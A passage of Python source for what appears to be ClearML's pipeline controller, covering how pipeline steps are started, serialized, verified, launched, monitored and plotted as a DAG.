Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
`parameters` are the configuration arguments passed to the ClearmlJob.
If the callback returned value is `False`,
the Node is skipped and so is any node in the DAG that relies on this node.
Notice the `parameters` are already parsed,
e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
.. code-block:: py
def step_created_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
parameters, # type: dict
):
pass
:param Callable step_task_completed_callback: Callback function, called when a step (Task) is completed
and it other jobs are executed. Allows a user to modify the Task status after completion.
.. code-block:: py
def step_completed_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
):
pass
:param wait: If True (default), start the pipeline controller, return only
after the pipeline is done (completed/aborted/failed)
:return: True, if the controller started. False, if the controller did not start.
"""
if not self._task:
raise ValueError(
"Could not find main Task, "
"PipelineController must be created with `always_create_task=True`")
# serialize state only if we are running locally
if Task.running_locally() or not self._task.is_main_task():
self._verify()
self._serialize_pipeline_task()
self.update_execution_plot()
# stop current Task and execute remotely or no-op
self._task.execute_remotely(queue_name=queue, exit_process=True, clone=False)
if not Task.running_locally() and self._task.is_main_task():
self._start(
step_task_created_callback=step_task_created_callback,
step_task_completed_callback=step_task_completed_callback,
wait=wait
)
return True
def start_locally(self, run_pipeline_steps_locally=False):
# type: (bool) -> None
"""
Start the current pipeline locally, meaning the pipeline logic is running on the current machine,
instead of on the `services` queue.
Using run_pipeline_steps_locally=True you can run all the pipeline steps locally as sub-processes.
Notice: when running pipeline steps locally, it assumes local code execution
(i.e. it is running the local code as is, regardless of the git commit/diff on the pipeline steps Task)
:param run_pipeline_steps_locally: (default False) If True, run the
pipeline steps themselves locally as a subprocess (use for debugging the pipeline locally,
notice the pipeline code is expected to be available on the local machine)
"""
if not self._task:
raise ValueError(
"Could not find main Task, "
"PipelineController must be created with `always_create_task=True`")
if run_pipeline_steps_locally:
self._clearml_job_class = LocalClearmlJob
self._default_execution_queue = self._default_execution_queue or 'mock'
# serialize state only if we are running locally
self._verify()
self._serialize_pipeline_task()
self.update_execution_plot()
self._start(wait=True)
def create_draft(self):
# type: () -> None
"""
Optional, manually create & serialize the Pipeline Task.
After calling Pipeline.create(), users can edit the pipeline in the UI and enqueue it for execution.
Notice: this function should be used to programmatically create pipeline for later usage.
To automatically create and launch pipelines, call the `start()` method.
"""
self._verify()
self._serialize_pipeline_task()
self._task.close()
self._task.reset()
@classmethod
def get_logger(cls):
# type: () -> Logger
"""
Return a logger connected to the Pipeline Task.
The logger can be used by any function/tasks executed by the pipeline, in order to report
directly to the pipeline Task itself. It can also be called from the main pipeline control Task.
Raise ValueError if main Pipeline task could not be located.
:return: Logger object for reporting metrics (scalars, plots, debug samples etc.)
"""
return cls._get_pipeline_task().get_logger()
@classmethod
def upload_model(cls, model_name, model_local_path):
# type: (str, str) -> OutputModel
"""
Upload (add) a model to the main Pipeline Task object.
This function can be called from any pipeline component to directly add models into the main pipeline Task
The model file/path will be uploaded to the Pipeline Task and registered on the model repository.
Raise ValueError if main Pipeline task could not be located.
:param model_name: Model name as will appear in the model registry (in the pipeline's project)
:param model_local_path: Path to the local model file or directory to be uploaded.
If a local directory is provided the content of the folder (recursively) will be
packaged into a zip file and uploaded
"""
task = cls._get_pipeline_task()
model_name = str(model_name)
model_local_path = Path(model_local_path)
out_model = OutputModel(task=task, name=model_name)
out_model.update_weights(weights_filename=model_local_path.as_posix())
return out_model
@classmethod
def upload_artifact(
cls,
name, # type: str
artifact_object, # type: Any
metadata=None, # type: Optional[Mapping]
delete_after_upload=False, # type: bool
auto_pickle=True, # type: bool
preview=None, # type: Any
wait_on_upload=False, # type: bool
):
# type: (...) -> bool
"""
Upload (add) an artifact to the main Pipeline Task object.
This function can be called from any pipeline component to directly add artifacts into the main pipeline Task.
The artifact can be uploaded by any function/tasks executed by the pipeline, in order to report
directly to the pipeline Task itself. It can also be called from the main pipeline control Task.
Raise ValueError if main Pipeline task could not be located.
The currently supported upload artifact types include:
- string / Path - A path to artifact file. If a wildcard or a folder is specified, then ClearML
creates and uploads a ZIP file.
- dict - ClearML stores a dictionary as ``.json`` file and uploads it.
- pandas.DataFrame - ClearML stores a pandas.DataFrame as ``.csv.gz`` (compressed CSV) file and uploads it.
- numpy.ndarray - ClearML stores a numpy.ndarray as ``.npz`` file and uploads it.
- PIL.Image - ClearML stores a PIL.Image as ``.png`` file and uploads it.
- Any - If called with auto_pickle=True, the object will be pickled and uploaded.
:param str name: The artifact name.
.. warning::
If an artifact with the same name was previously uploaded, then it is overwritten.
:param object artifact_object: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **ClearML Web-App (UI)**, **ARTIFACTS** tab.
:param bool delete_after_upload: After the upload, delete the local copy of the artifact
- ``True`` - Delete the local copy of the artifact.
- ``False`` - Do not delete. (default)
:param bool auto_pickle: If True (default) and the artifact_object is not one of the following types:
pathlib2.Path, dict, pandas.DataFrame, numpy.ndarray, PIL.Image, url (string), local_file (string)
the artifact_object will be pickled and uploaded as pickle file artifact (with file extension .pkl)
:param Any preview: The artifact preview
:param bool wait_on_upload: Whether or not the upload should be synchronous, forcing the upload to complete
before continuing.
:return: The status of the upload.
- ``True`` - Upload succeeded.
- ``False`` - Upload failed.
:raise: If the artifact object type is not supported, raise a ``ValueError``.
"""
task = cls._get_pipeline_task()
return task.upload_artifact(
name=name, artifact_object=artifact_object, metadata=metadata, delete_after_upload=delete_after_upload,
auto_pickle=auto_pickle, preview=preview, wait_on_upload=wait_on_upload)
def stop(self, timeout=None, mark_failed=False, mark_aborted=False):
# type: (Optional[float], bool, bool) -> ()
"""
Stop the pipeline controller and the optimization thread.
If mark_failed and mark_aborted are False (default) mark the pipeline as completed,
unless one of the steps failed, then mark the pipeline as failed.
:param timeout: Wait timeout for the optimization thread to exit (minutes).
The default is ``None``, indicating do not wait terminate immediately.
:param mark_failed: If True, mark the pipeline task as failed. (default False)
:param mark_aborted: If False, mark the pipeline task as aborted. (default False)
"""
self._stop_event.set()
self.wait(timeout=timeout)
if not self._task:
return
self._task.close()
if mark_failed:
self._task.mark_failed(status_reason='Pipeline aborted and failed', force=True)
elif mark_aborted:
self._task.mark_aborted(status_reason='Pipeline aborted', force=True)
elif self._pipeline_task_status_failed:
print('Setting pipeline controller Task as failed (due to failed steps) !')
self._task.mark_failed(status_reason='Pipeline step failed', force=True)
def wait(self, timeout=None):
# type: (Optional[float]) -> bool
"""
Wait for the pipeline to finish.
.. note::
This method does not stop the pipeline. Call :meth:`stop` to terminate the pipeline.
:param float timeout: The timeout to wait for the pipeline to complete (minutes).
If ``None``, then wait until we reached the timeout, or pipeline completed.
:return: True, if the pipeline finished. False, if the pipeline timed out.
"""
if not self.is_running():
return True
if timeout is not None:
timeout *= 60.
_thread = self._thread
_thread.join(timeout=timeout)
if _thread.is_alive():
return False
return True
def is_running(self):
# type: () -> bool
"""
return True if the pipeline controller is running.
:return: A boolean indicating whether the pipeline controller is active (still running) or stopped.
"""
return self._thread is not None and self._thread.is_alive()
def is_successful(self):
# type: () -> bool
"""
return True if the pipeline controller is fully executed and none of the steps / Tasks failed
:return: A boolean indicating whether all steps did not fail
"""
return self._thread and not self.is_running() and not self._pipeline_task_status_failed
def elapsed(self):
# type: () -> float
"""
Return minutes elapsed from controller stating time stamp.
:return: The minutes from controller start time. A negative value means the process has not started yet.
"""
if self._start_time is None:
return -1.0
return (time() - self._start_time) / 60.
def get_pipeline_dag(self):
# type: () -> Mapping[str, PipelineController.Node]
"""
Return the pipeline execution graph, each node in the DAG is PipelineController.Node object.
Graph itself is a dictionary of Nodes (key based on the Node name),
each node holds links to its parent Nodes (identified by their unique names)
:return: execution tree, as a nested dictionary. Example:
.. code-block:: py
{
'stage1' : Node() {
name: 'stage1'
job: ClearmlJob
...
},
}
"""
return self._nodes
def get_processed_nodes(self):
# type: () -> Sequence[PipelineController.Node]
"""
Return the a list of the processed pipeline nodes, each entry in the list is PipelineController.Node object.
:return: executed (excluding currently executing) nodes list
"""
return {k: n for k, n in self._nodes.items() if n.executed}
def get_running_nodes(self):
# type: () -> Sequence[PipelineController.Node]
"""
Return the a list of the currently running pipeline nodes,
each entry in the list is PipelineController.Node object.
:return: Currently running nodes list
"""
return {k: n for k, n in self._nodes.items() if k in self._running_nodes}
def update_execution_plot(self):
# type: () -> ()
"""
Update sankey diagram of the current pipeline
"""
with self._reporting_lock:
self._update_execution_plot()
# also trigger node monitor scanning
self._scan_monitored_nodes()
def add_parameter(self, name, default=None, description=None):
# type: (str, Optional[Any], Optional[str]) -> None
"""
Add a parameter to the pipeline Task.
The parameter can be used as input parameter for any step in the pipeline.
Notice all parameters will appear under the PipelineController Task's Hyper-parameters -> Pipeline section
Example: pipeline.add_parameter(name='dataset', description='dataset ID to process the pipeline')
Then in one of the steps we can refer to the value of the parameter with '${pipeline.dataset}'
:param name: String name of the parameter.
:param default: Default value to be put as the default value (can be later changed in the UI)
:param description: String description of the parameter and its usage in the pipeline
"""
self._pipeline_args[str(name)] = str(default or '')
if description:
self._pipeline_args_desc[str(name)] = str(description)
def get_parameters(self):
# type: () -> dict
"""
Return the pipeline parameters dictionary
:return: Dictionary str -> str
"""
return self._pipeline_args
def _create_task_from_function(
self, docker, docker_args, docker_bash_setup_script,
function, function_input_artifacts, function_kwargs, function_return,
packages, project_name, task_name, task_type, repo, branch, commit, helper_functions
):
task_definition = CreateFromFunction.create_task_from_function(
a_function=function,
function_kwargs=function_kwargs or None,
function_input_artifacts=function_input_artifacts,
function_return=function_return,
project_name=project_name,
task_name=task_name,
task_type=task_type,
repo=repo,
branch=branch,
commit=commit,
packages=packages,
docker=docker,
docker_args=docker_args,
docker_bash_setup_script=docker_bash_setup_script,
output_uri=None,
helper_functions=helper_functions,
dry_run=True,
)
return task_definition
def _start(
self,
step_task_created_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]] # noqa
step_task_completed_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node], None]] # noqa
wait=True,
):
# type: (...) -> bool
"""
Start the pipeline controller.
If the calling process is stopped, then the controller stops as well.
:param Callable step_task_created_callback: Callback function, called when a step (Task) is created
and before it is sent for execution. Allows a user to modify the Task before launch.
Use `node.job` to access the ClearmlJob object, or `node.job.task` to directly access the Task object.
`parameters` are the configuration arguments passed to the ClearmlJob.
If the callback returned value is `False`,
the Node is skipped and so is any node in the DAG that relies on this node.
Notice the `parameters` are already parsed,
e.g. `${step1.parameters.Args/param}` is replaced with relevant value.
.. code-block:: py
def step_created_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
parameters, # type: dict
):
pass
:param Callable step_task_completed_callback: Callback function, called when a step (Task) is completed
and it other jobs are executed. Allows a user to modify the Task status after completion.
.. code-block:: py
def step_completed_callback(
pipeline, # type: PipelineController,
node, # type: PipelineController.Node,
):
pass
:param wait: If True (default), start the pipeline controller, return only
after the pipeline is done (completed/aborted/failed)
:return: True, if the controller started. False, if the controller did not start.
"""
if self._thread:
return True
self._prepare_pipeline(step_task_completed_callback, step_task_created_callback)
self._thread = Thread(target=self._daemon)
self._thread.daemon = True
self._thread.start()
if wait:
self.wait()
self.stop()
return True
def _prepare_pipeline(
self,
step_task_created_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node, dict], bool]] # noqa
step_task_completed_callback=None, # type: Optional[Callable[[PipelineController, PipelineController.Node], None]] # noqa
):
# type (...) -> None
params, pipeline_dag = self._serialize_pipeline_task()
# deserialize back pipeline state
if not params['_continue_pipeline_']:
for k in pipeline_dag:
pipeline_dag[k]['executed'] = None
self._default_execution_queue = params['_default_queue_']
self._add_pipeline_tags = params['_add_pipeline_tags_']
self._target_project = params['_target_project_'] or ''
self._deserialize(pipeline_dag)
# if we continue the pipeline, make sure that we re-execute failed tasks
if params['_continue_pipeline_']:
for node in list(self._nodes.values()):
if node.executed is False:
node.executed = None
if not self._verify():
raise ValueError("Failed verifying pipeline execution graph, "
"it has either inaccessible nodes, or contains cycles")
self.update_execution_plot()
self._start_time = time()
self._stop_event = Event()
self._experiment_created_cb = step_task_created_callback
self._experiment_completed_cb = step_task_completed_callback
def _serialize_pipeline_task(self):
# type: () -> (dict, dict)
"""
Serialize current pipeline state into the main Task
:return: params, pipeline_dag
"""
params = {
'_default_queue_': self._default_execution_queue,
'_add_pipeline_tags_': self._add_pipeline_tags,
'_target_project_': self._target_project,
}
pipeline_dag = self._serialize()
# serialize pipeline state
if self._task and self._auto_connect_task:
if self._task.running_locally():
# noinspection PyProtectedMember
self._task._set_configuration(
name=self._config_section, config_type='dictionary',
config_text=json.dumps(pipeline_dag, indent=2))
params.update(self._pipeline_args)
# noinspection PyProtectedMember
self._task._set_parameters(
{'{}/{}'.format(self._args_section, k): str(v) for k, v in params.items()},
__parameters_descriptions=self._pipeline_args_desc,
__update=True,
)
params['_continue_pipeline_'] = False
# make sure we have a unique version number (auto bump version if needed)
# only needed when manually (from code) creating pipelines
self._verify_pipeline_version()
# noinspection PyProtectedMember
pipeline_hash = self._get_task_hash()
# noinspection PyProtectedMember
self._task._set_runtime_properties({
self._runtime_property_hash: "{}:{}".format(pipeline_hash, self._version),
})
else:
self._task.connect_configuration(pipeline_dag, name=self._config_section)
self._task.connect(self._pipeline_args, name=self._args_section)
self._task.connect(params, name=self._args_section)
# noinspection PyProtectedMember
if self._task._get_runtime_properties().get(self._runtime_property_hash):
params['_continue_pipeline_'] = True
else:
# noinspection PyProtectedMember
pipeline_hash = ClearmlJob._create_task_hash(self._task)
# noinspection PyProtectedMember
self._task._set_runtime_properties({
self._runtime_property_hash: "{}:{}".format(pipeline_hash, self._version),
})
params['_continue_pipeline_'] = False
return params, pipeline_dag
def _verify_pipeline_version(self):
# if no version bump needed, just set the property
if not self._auto_version_bump:
self._task.set_user_properties(version=self._version)
return
# check if pipeline version exists, if it does increase version
pipeline_hash = self._get_task_hash()
# noinspection PyProtectedMember
existing_tasks = Task._query_tasks(
project=[self._task.project], task_name=exact_match_regex(self._task.name),
type=[str(self._task.task_type)],
system_tags=['-{}'.format(Task.archived_tag), self._tag],
_all_=dict(fields=['runtime.{}'.format(self._runtime_property_hash)],
pattern=":{}".format(self._version)),
only_fields=['id', 'runtime'],
)
if existing_tasks:
# check if hash match the current version.
matched = True
for t in existing_tasks:
h, _, v = t.runtime.get(self._runtime_property_hash, '').partition(':')
if v == self._version:
matched = bool(h == pipeline_hash)
break
# if hash did not match, look for the highest version
if not matched:
# noinspection PyProtectedMember
existing_tasks = Task._query_tasks(
project=[self._task.project], task_name=exact_match_regex(self._task.name),
type=[str(self._task.task_type)],
system_tags=['-{}'.format(Task.archived_tag), self._tag],
only_fields=['id', 'hyperparams', 'runtime'],
)
found_match_version = False
existing_versions = set([self._version]) # noqa
for t in existing_tasks:
if not t.hyperparams:
continue
v = t.hyperparams.get('properties', {}).get('version')
if v:
existing_versions.add(v.value)
if t.runtime:
h, _, _ = t.runtime.get(self._runtime_property_hash, '').partition(':')
if h == pipeline_hash:
self._version = v.value
found_match_version = True
break
# match to the version we found:
if found_match_version:
getLogger('clearml.automation.controller').info(
'Existing Pipeline found, matching version to: {}'.format(self._version))
else:
# if we did not find a matched pipeline version, get the max one and bump the version by 1
while True:
v = self._version.split('.')
self._version = '.'.join(v[:-1] + [str(int(v[-1]) + 1)])
if self._version not in existing_versions:
break
getLogger('clearml.automation.controller').info(
'Existing Pipeline version found, bump new version to: {}'.format(self._version))
self._task.set_user_properties(version=self._version)
def _get_task_hash(self):
params_override = dict(**(self._task.get_parameters() or {}))
params_override.pop('properties/version', None)
# noinspection PyProtectedMember
pipeline_hash = ClearmlJob._create_task_hash(self._task, params_override=params_override)
return pipeline_hash
def _serialize(self):
# type: () -> dict
"""
Store the definition of the pipeline DAG into a dictionary.
This dictionary will be used to store the DAG as a configuration on the Task
:return:
"""
dag = {name: dict((k, v) for k, v in node.__dict__.items()
if k not in ('job', 'name', 'task_factory_func'))
for name, node in list(self._nodes.items())}
return dag
def _deserialize(self, dag_dict):
# type: (dict) -> ()
"""
Restore the DAG from a dictionary.
This will be used to create the DAG from the dict stored on the Task, when running remotely.
:return:
"""
# if we do not clone the Task, only merge the parts we can override.
for name in list(self._nodes.keys()):
if not self._nodes[name].clone_task and name in dag_dict and not dag_dict[name].get('clone_task'):
for k in ('queue', 'parents', 'timeout', 'parameters', 'configurations', 'task_overrides'):
setattr(self._nodes[name], k, dag_dict[name].get(k) or type(getattr(self._nodes[name], k))())
# if we do clone the Task deserialize everything, except the function creating
self._nodes = {
k: self.Node(name=k, **v)
if k not in self._nodes or (v.get('base_task_id') and v.get('clone_task'))
else self._nodes[k]
for k, v in dag_dict.items()}
def _has_stored_configuration(self):
"""
Return True if we are running remotely and we have stored configuration on the Task
"""
if self._auto_connect_task and self._task and not self._task.running_locally() and self._task.is_main_task():
stored_config = self._task.get_configuration_object(self._config_section)
return bool(stored_config)
return False
def _verify(self):
# type: () -> bool
"""
Verify the DAG, (i.e. no cycles and no missing parents)
On error raise ValueError with verification details
:return: return True iff DAG has no errors
"""
# verify nodes
for node in list(self._nodes.values()):
# raise value error if not verified
self._verify_node(node)
# check the dag itself
if not self._verify_dag():
return False
return True
def _verify_node(self, node):
# type: (PipelineController.Node) -> bool
"""
Raise ValueError on verification errors
:return: Return True iff the specific node is verified
"""
if not node.base_task_id and not node.task_factory_func:
raise ValueError("Node '{}', base_task_id is empty".format(node.name))
if not self._default_execution_queue and not node.queue:
raise ValueError("Node '{}' missing execution queue, "
"no default queue defined and no specific node queue defined".format(node.name))
task = node.task_factory_func or Task.get_task(task_id=node.base_task_id)
if not task:
raise ValueError("Node '{}', base_task_id={} is invalid".format(node.name, node.base_task_id))
pattern = self._step_ref_pattern
# verify original node parents
if node.parents and not all(isinstance(p, str) and p in self._nodes for p in node.parents):
raise ValueError("Node '{}', parents={} is invalid".format(node.name, node.parents))
parents = set()
for k, v in node.parameters.items():
if isinstance(v, str):
for g in pattern.findall(v):
ref_step = self.__verify_step_reference(node, g)
if ref_step:
parents.add(ref_step)
# verify we have a section name
if '/' not in k:
raise ValueError(
"Section name is missing in parameter \"{}\", "
"parameters should be in the form of "
"\"`section-name`/parameter\", example: \"Args/param\"".format(v))
if parents and parents != set(node.parents or []):
parents = parents - set(node.parents or [])
getLogger('clearml.automation.controller').info(
'Node "{}" missing parent reference, adding: {}'.format(node.name, parents))
node.parents = (node.parents or []) + list(parents)
# verify and fix monitoring sections:
def _verify_monitors(monitors, monitor_type, nested_pairs=False):
if not monitors:
return monitors
if nested_pairs:
if not all(isinstance(x, (list, tuple)) and x for x in monitors):
raise ValueError("{} should be a list of tuples, found: {}".format(monitor_type, monitors))
# convert single pair into a pair of pairs:
conformed_monitors = [
pair if isinstance(pair[0], (list, tuple)) else (pair, pair) for pair in monitors
]
# verify pair of pairs
if not all(isinstance(x[0][0], str) and isinstance(x[0][1], str) and
isinstance(x[1][0], str) and isinstance(x[1][1], str) for x in conformed_monitors):
raise ValueError("{} should be a list of tuples, found: {}".format(monitor_type, monitors))
else:
# verify a list of tuples
if not all(isinstance(x, (list, tuple, str)) and x for x in monitors):
raise ValueError(
"{} should be a list of tuples, found: {}".format(monitor_type, monitors))
# convert single str into a pair of pairs:
conformed_monitors = [
pair if isinstance(pair, (list, tuple)) else (pair, pair) for pair in monitors
]
# verify pair of pairs
if not all(isinstance(x[0], str) and isinstance(x[1], str) for x in conformed_monitors):
raise ValueError(
"{} should be a list of tuples, found: {}".format(monitor_type, monitors))
return conformed_monitors
# verify and fix monitoring sections:
node.monitor_metrics = _verify_monitors(node.monitor_metrics, 'monitor_metrics', nested_pairs=True)
node.monitor_artifacts = _verify_monitors(node.monitor_artifacts, 'monitor_artifacts')
node.monitor_models = _verify_monitors(node.monitor_models, 'monitor_models')
return True
def _verify_dag(self):
# type: () -> bool
"""
:return: True iff the pipeline dag is fully accessible and contains no cycles
"""
visited = set()
prev_visited = None
while prev_visited != visited:
prev_visited = copy(visited)
for k, node in list(self._nodes.items()):
if k in visited:
continue
if any(p == node.name for p in node.parents or []):
# node cannot have itself as parent
return False
if not all(p in visited for p in node.parents or []):
continue
visited.add(k)
# return False if we did not cover all the nodes
return not bool(set(self._nodes.keys()) - visited)
def _launch_node(self, node):
# type: (PipelineController.Node) -> ()
"""
Launch a single node (create and enqueue a ClearmlJob)
:param node: Node to launch
:return: Return True if a new job was launched
"""
if node.job or node.executed:
return False
updated_hyper_parameters = {}
for k, v in node.parameters.items():
updated_hyper_parameters[k] = self._parse_step_ref(v)
task_overrides = self._parse_task_overrides(node.task_overrides) if node.task_overrides else None
extra_args = dict()
if self._target_project:
extra_args['project'] = get_or_create_project(
session=self._task.session if self._task else Task.default_session,
project_name=self._target_project)
skip_node = None
if self._pre_step_callbacks.get(node.name):
skip_node = self._pre_step_callbacks[node.name](self, node, updated_hyper_parameters)
if skip_node is False:
node.skip_job = True
return True
task_id = node.base_task_id
disable_clone_task = not node.clone_task
task_factory_func_task = None
if node.task_factory_func:
# create Task
task_factory_func_task = node.task_factory_func(node)
task_id = task_factory_func_task.id
disable_clone_task = True
try:
node.job = self._clearml_job_class(
base_task_id=task_id,
parameter_override=updated_hyper_parameters,
configuration_overrides=node.configurations,
tags=['{} {}'.format(self._node_tag_prefix, self._task.id)]
if self._add_pipeline_tags and self._task else None,
parent=self._task.id if self._task else None,
disable_clone_task=disable_clone_task,
task_overrides=task_overrides,
allow_caching=node.cache_executed_step,
**extra_args
)
except Exception:
self._pipeline_task_status_failed = True
raise
if self._experiment_created_cb:
skip_node = self._experiment_created_cb(self, node, updated_hyper_parameters)
if skip_node is False:
# skipping node
getLogger('clearml.automation.controller').warning(
'Skipping node {} on callback request'.format(node))
# delete the job we just created
node.job.delete()
node.skip_job = True
elif node.job.is_cached_task():
node.executed = node.job.task_id()
if task_factory_func_task:
task_factory_func_task.delete(raise_on_error=False)
self._running_nodes.append(node.name)
else:
self._running_nodes.append(node.name)
return node.job.launch(queue_name=node.queue or self._default_execution_queue)
return True
def _update_execution_plot(self):
# type: () -> ()
"""
Update sankey diagram of the current pipeline
"""
if not self._task:
return
sankey_node = dict(
label=[],
color=[],
hovertemplate='%{label}<extra></extra>',
# customdata=[],
# hovertemplate='%{label}<br />Hyper-Parameters:<br />%{customdata}<extra></extra>',
)
sankey_link = dict(
source=[],
target=[],
value=[],
# hovertemplate='%{target.label}<extra></extra>',
hovertemplate='<extra></extra>',
)
visited = []
node_params = []
nodes = list(self._nodes.values())
while nodes:
next_nodes = []
for node in nodes:
if not all(p in visited for p in node.parents or []):
next_nodes.append(node)
continue
visited.append(node.name)
idx = len(visited) - 1
parents = [visited.index(p) for p in node.parents or []]
node_params.append(
(node.job.task_parameter_override
if node.job and node.job.task_parameter_override
else node.parameters) or {})
# sankey_node['label'].append(node.name)
# sankey_node['customdata'].append(
# '<br />'.join('{}: {}'.format(k, v) for k, v in (node.parameters or {}).items()))
sankey_node['label'].append(
'{}<br />'.format(node.name) +
'<br />'.join('{}: {}'.format(k, v if len(str(v)) < 24 else (str(v)[:24]+' ...'))
for k, v in (node.parameters or {}).items()))
sankey_node['color'].append(self._get_node_color(node))
for p in parents:
sankey_link['source'].append(p)
sankey_link['target'].append(idx)
sankey_link['value'].append(1)
nodes = next_nodes
# make sure we have no independent (unconnected) nodes
single_nodes = []
for i in [n for n in range(len(visited)) if n not in sankey_link['source'] and n not in sankey_link['target']]:
single_nodes.append(i)
# create the sankey graph
dag_flow = dict(
link=sankey_link,
node=sankey_node,
textfont=dict(color='rgba(0,0,0,0)', size=1),
type='sankey',
orientation='h'
)
table_values = self._build_table_report(node_params, visited)
# hack, show single node sankey
if single_nodes:
singles_flow = dict(
x=list(range(len(single_nodes))), y=[1] * len(single_nodes),
text=[v for i, v in enumerate(sankey_node['label']) if i in single_nodes],
mode='markers',
hovertemplate="%{text}<extra></extra>",
marker=dict(
color=[v for i, v in enumerate(sankey_node['color']) if i in single_nodes],
size=[40] * len(single_nodes),
),
showlegend=False,
type='scatter',
)
# only single nodes
if len(single_nodes) == len(sankey_node['label']):
fig = dict(data=[singles_flow], layout={
'hovermode': 'closest', 'xaxis': {'visible': False}, 'yaxis': {'visible': False}})
else:
dag_flow['domain'] = {'x': [0.0, 1.0], 'y': [0.2, 1.0]}
fig = dict(data=[dag_flow, singles_flow],
layout={'autosize': True,
'hovermode': 'closest',
'xaxis': {'anchor': 'y', 'domain': [0.0, 1.0], 'visible': False},
'yaxis': {'anchor': 'x', 'domain': [0.0, 0.15], 'visible': False}
})
else:
# create the sankey plot
fig = dict(data=[dag_flow], layout={'xaxis': {'visible': False}, 'yaxis': {'visible': False}})
# report DAG
self._task.get_logger().report_plotly(
title=self._report_plot_execution_flow['title'],
series=self._report_plot_execution_flow['series'],
iteration=0, figure=fig)
# report detailed table
self._task.get_logger().report_table(
title=self._report_plot_execution_details['title'],
series=self._report_plot_execution_details['series'],
iteration=0, table_plot=table_values)
def _build_table_report(self, node_params, visited):
# type: (List, List) -> List[List]
"""
Create the detailed table report on all the jobs in the pipeline
:param node_params: list of node parameters
:param visited: list of nodes
:return: Table as List of List of strings (cell)
"""
task_link_template = self._task.get_output_log_web_page() \
.replace('/{}/'.format(self._task.project), '/{project}/') \
.replace('/{}/'.format(self._task.id), '/{task}/')
table_values = [["Pipeline Step", "Task ID", "Task Name", "Status", "Parameters"]]
for name, param in zip(visited, node_params):
param_str = str(param) if param else ''
if len(param_str) > 3:
# remove {} from string
param_str = param_str[1:-1]
step_name = name
if self._nodes[name].base_task_id:
step_name += '\n[<a href="{}"> {} </a>]'.format(
task_link_template.format(project='*', task=self._nodes[name].base_task_id), 'base task')
table_values.append(
[step_name,
self.__create_task_link(self._nodes[name], task_link_template),
self._nodes[name].job.task.name if self._nodes[name].job else '',
self.__get_node_status(self._nodes[name]),
param_str]
)
return table_values
@staticmethod
def _get_node_color(node):
# type (self.Mode) -> str
"""
Return the node color based on the node/job state
:param node: A node in the pipeline
:return: string representing the color of the node (e.g. "red", "green", etc)
"""
if not node:
return ""
if node.executed is not None:
if node.job and node.job.is_failed():
return "red" # failed job
elif node.job and node.job.is_cached_task():
return "darkslateblue"
elif not node.job or node.job.is_completed():
return "blue" # completed job
else:
return "royalblue" # aborted job
elif node.job:
if node.job.is_pending():
return "#bdf5bd" # lightgreen, pending in queue
elif node.job.is_completed():
return "blue" # completed job
elif node.job.is_failed():
return "red" # failed job
elif node.job.is_stopped():
return "royalblue" # aborted job
else:
return "green" # running job
elif node.skip_job:
return "gray" # skipped job
else:
return "lightsteelblue" # pending job
def _force_task_configuration_update(self):
pipeline_dag = self._serialize()
if self._task:
# noinspection PyProtectedMember
self._task._set_configuration(
name=self._config_section, config_type='dictionary',
config_text=json.dumps(pipeline_dag, indent=2))
def _daemon(self):
# type: () -> ()
"""
The main pipeline execution loop. This loop is executed on its own dedicated thread.
:return:
"""
pooling_counter = 0
launched_nodes = set()
last_monitor_report = last_plot_report = time()
while self._stop_event:
# stop request
if self._stop_event.wait(self._pool_frequency if pooling_counter else 0.01):
break
pooling_counter += 1
# check the pipeline time limit
if self._pipeline_time_limit and (time() - self._start_time) > self._pipeline_time_limit:
break
# check the state of all current jobs
# if no a job ended, continue
completed_jobs = []
force_execution_plot_update = False
nodes_failed_stop_pipeline = []
for j in self._running_nodes:
node = self._nodes[j]
if not node.job:
continue
if node.job.is_stopped():
completed_jobs.append(j)
node_failed = node.job.is_failed()
node.executed = node.job.task_id() if not node_failed else False
if j in launched_nodes:
launched_nodes.remove(j)
# check if we need to stop all running steps
if node_failed and self._abort_running_steps_on_failure and not node.continue_on_fail:
nodes_failed_stop_pipeline.append(node.name)
elif node.timeout:
started = node.job.task.data.started
if (datetime.now().astimezone(started.tzinfo) - started).total_seconds() > node.timeout:
node.job.abort()
completed_jobs.append(j)
node.executed = node.job.task_id()
elif j in launched_nodes and node.job.is_running():
# make sure update the execution graph when the job started running
# (otherwise it will still be marked queued)
launched_nodes.remove(j)
force_execution_plot_update = True
# update running jobs
self._running_nodes = [j for j in self._running_nodes if j not in completed_jobs]
# nothing changed, we can sleep
if not completed_jobs and self._running_nodes:
# force updating the pipeline state (plot) at least every 5 min.
if force_execution_plot_update or time()-last_plot_report > self._update_execution_plot_interval:
last_plot_report = time()
last_monitor_report = time()
self.update_execution_plot()
elif time()-last_monitor_report > self._monitor_node_interval:
last_monitor_report = time()
self._scan_monitored_nodes()
continue
# callback on completed jobs
if self._experiment_completed_cb or self._post_step_callbacks:
for job in completed_jobs:
job_node = self._nodes.get(job)
if not job_node:
continue
if self._experiment_completed_cb:
self._experiment_completed_cb(self, job_node)
if self._post_step_callbacks.get(job_node.name):
self._post_step_callbacks[job_node.name](self, job_node)
# check if we need to stop the pipeline, and abort all running steps
if nodes_failed_stop_pipeline:
print('Aborting pipeline and stopping all running steps, node {} failed'.format(
nodes_failed_stop_pipeline))
break
# Pull the next jobs in the pipeline, based on the completed list
next_nodes = []
for node in list(self._nodes.values()):
# check if already processed or needs to be skipped
if node.job or node.executed or node.skip_job:
continue
completed_parents = [bool(p in self._nodes and self._nodes[p].executed) for p in node.parents or []]
if all(completed_parents):
next_nodes.append(node.name)
# update the execution graph
for name in next_nodes:
if self._launch_node(self._nodes[name]) and not self._nodes[name].skip_job:
print('Launching step: {}'.format(name))
print('Parameters:\n{}'.format(
self._nodes[name].job.task_parameter_override if self._nodes[name].job
else self._nodes[name].parameters))
print('Configurations:\n{}'.format(self._nodes[name].configurations))
print('Overrides:\n{}'.format(self._nodes[name].task_overrides))
launched_nodes.add(name)
# check if node is cached do not wait for event but run the loop again
if self._nodes[name].executed:
pooling_counter = 0
else:
getLogger('clearml.automation.controller').warning(
